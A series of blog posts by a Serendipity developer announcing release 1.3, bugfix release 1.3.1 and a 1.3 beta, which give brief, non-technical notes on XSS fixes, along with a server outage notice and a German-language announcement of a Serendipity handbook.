Entries by Garvin

As of today, the netmirror.org server seems to be having a hiccup. The serendipity Plugin Spartacus by default requires this server to provide automatic plugin and theme updates and downloads. The inavailibility of this server can lead to timeouts and not being able to install new plugins.

The issue should resolve itself once netmirror.org is up again. Temporarily you can either reconfigure your Spartacus-plugin to use the SourceForge-Mirrors, or completely disable the Spartacus plugin. Using the s9y.org mirror will not help you, as this server is currently not hosting any files.

I will post an update once the server is up again. Sorry for the inconvenience.

Serendipity 1.3.1 has been released. This is a bugfix and security related release, basically adressing a potential XSS issue within the Top Referrers plugin as well as hypothetical XSS issues with the installer.

This release also adresses some basic PostgreSQL8 related problems, because implicit type casts have been removed from this version, causing breakage with several Serendipity core features. The fix for this is only partial and will still happen in (less common) functions of Serendipity. There is no ultimate solution to this because implicit type casts are required for certain entryproperty operations. Maybe the PostgreSQL8 team will think about if implicit type casts are not also quite helpful. ;-)

The only new feature addition is the exposition of a new smarty {serendipity_getImageSize} function.

This upgrade is recommended for users that use the Top Referrers plugin and new installations of Serendipity. Many thanks to Hanno Böck, once again, for reporting (and fixing) the two XSS issues (CVE-2008-1385 and CVE-2008-1386)!

You can find the new release on the s9y.org download page. Upgrade by simply uploading the deflated archive files to your webspace.

Serendipity 1.3 has finally been released. The new release is mainly a feature consolidation release, but also contains XSS security fixes:

• The karma rating plugin has been upgraded to support nice, CSS-based rating graphics (see this post) and an overall rehaul on the its coding.
• Make the Spartacus plugin be able to use FTP upload, a workaround for SafeMode PHP restrictions. Also add a remote backend for plugin update checks.
• An importer for phpNuke and lifetype has been added.
• Support for pingbacks has been improved a lot. Trackbacks can now be blocked based on Sender IP checks.
• Add better CSS styling for some internal plugins and the embedding of images. Also made the Remote-RSS plugin to be capable of Smarty-Templating.
• Increased Smarty templating features for the {serendipity_fetchPrintEntries} function, to be able to check for entry properties.
• Add support for SQRelay.
• Minor CSS and graphic updates to the Bulletproof template.

The full list of 41 changes to this release are documented within the NEWS file.

Regarding Security, the bundled Smarty library has been updated to version 2.6.19 and adresses an issue in environments where the PHP security mode is required. Also, the new Serendipity release contains tighter backend XSS checks so that environments with untrusted authors can be more secure - many thanks to Hanno Böck for addressing this. Most importantly, an issue with XSS attacks within received trackbacks has been discovered by Peter Hüwe and was fixed.

The update is easy as usual, and recommended for Serendipity users - especially if you do not regularly moderate or check your incoming trackbacks.

Upgrade pointers can be found in the FAQ and is as easy as just to upload the new files.

Have fun!

Serendipity 1.3-beta1 has been released. This beta is considered a release candidate before the final 1.3 release, which is scheduled to be released at the end of this month.

The Freetag plugin has been updated to version 2.96 to fix a possible XSS to the tagcloud output.

XSS attacks can be used by visitors to display foreign HTML or JavaScript to visitors of the blog, if they visit specially crafted URLs. This attack basically allows for cookie stealing.

Users of the freetag plugin should upgrade to the latest version; upgrading via Spartacus-Plugin or Spartacus.s9y.org is just a matter of a few minutes. Thanks to Alex from Bitsploit.de for reporting this issue to us.

(This posting is written in german, as it currently only has relevance for german readers)

Wie man jetzt in meinem Blog auf der linken Seite erkennen kann, ist das von mir geschriebene offzielle Serendipity-Handbuch seit kurzem vorbestellbar.

Rund 700 Seiten liegen dem Verlag derzeit zur Korrektur und Verfeinerung vor, prall gefüllt mit ausführlichen Beschreibungen von allem, was mit Serendipity zu tun hat.

Viel Herzblut und Freizeit ist in das Buch geflossen, und ich hoffe damit sehr, den Nutzern endlich eine vollständige Dokumentation in die Hand geben zu können. Gleichermaßen ist es auch für Neulinge zum System gedacht, da alle Aspekte des Systems beschrieben werden.

Wer jetzt vorbestellt, kann dafür sorgen, dass das Buch etwas zügiger erscheint - und ihr es auch direkt in den Händen halten könnt. Der derzeitige Veröffentlichungstermin ist für Mai 2008 angepeilt. Vorbestellungen werden sowohl über Amazon, OpenSourcePress als auch bei jeder Bücherei angenommen.